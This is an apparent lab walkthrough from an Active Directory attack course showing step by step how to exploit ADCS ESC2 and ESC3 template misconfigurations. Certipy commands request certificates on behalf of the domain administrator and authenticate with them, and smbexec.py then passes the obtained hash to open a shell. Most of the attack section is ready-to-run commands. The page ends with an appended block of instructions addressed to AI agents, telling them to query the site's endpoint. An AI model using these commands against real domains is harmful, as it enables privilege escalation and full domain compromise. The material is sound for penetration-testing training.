# ADCS - ESC2 & ESC3

* in order to abuse this misconfiguration, the following conditions must be met:
  1. **The Enterprise CA grants low-privileged users enrollment rights.** Details are the same as in ESC1.
  2. **Manager approval is disabled.** Details are the same as in ESC1.
  3. **No authorized signatures are required.** Details are the same as in ESC1.
  4. **An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users.** Details are the same as in ESC1.
  5. **The certificate template defines Any Purpose EKUs or no EKU**.

### Query cert

```
sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC2 -ca MARYLAND-CA
```

<figure><img src="/files/rhoprctgUwUZatkPahr1" alt=""><figcaption></figcaption></figure>

* Query cert with the Certificate Request Agent certificate we get before (-pfx)

```
sudo certipy req -u joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template User -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx joaquin.pereida.pfx
```

<figure><img src="/files/Zw4wZLqcDFEPPvyUjGSE" alt=""><figcaption></figcaption></figure>

* Auth

```
sudo certipy auth -pfx administrator.pfx -dc-ip 192.168.56.12
```

<figure><img src="/files/nTXZpSN5xfHeKCwu4tt4" alt=""><figcaption></figcaption></figure>

### Get Shell or POWERSHELL :)

```
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local'
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da 'MARYLAND'/'Administrator'@'maryland.local' -shell-type powershell
 
```

* We also can do the same with the ESC3-CRA and ESC3 templates in the lab :

## Enrollment Agent Templates — ESC3 <a href="#c08e" id="c08e"></a>

In order to abuse this misconfiguration, the following conditions must be met:

1. **The Enterprise CA grants low-privileged users enrollment rights.** Details are the same as in ESC1.
2. **Manager approval is disabled.** Details are the same as in ESC1.
3. **No authorized signatures are required.** Details are the same as in ESC1.
4. **An overly permissive certificate template security descriptor grants certificate enrollment rights to low-privileged users.** Details are the same as in ESC1.
5. **The certificate template defines the Certificate Request Agent EKU**. The Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) allows for requesting other certificate templates on behalf of other principals.
6. **Enrollment agent restrictions are not implemented on the CA.**

```
certipy req -u  joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3-CRA -ca MARYLAND-CA
certipy req -u  joaquin.Pereida@maryland.local -p 'horse' -target 192.168.56.23 -template ESC3 -ca MARYLAND-CA -on-behalf-of 'maryland\administrator' -pfx  joaquin.Pereida.pfx
certipy auth -pfx administrator.pfx -username administrator -domain maryland.local -dc-ip 192.168.56.12
```

<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://watchdogsacademy.gitbook.io/attacking-active-directory/active-directory-certificate-services-adcs/adcs-esc2-and-esc3.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.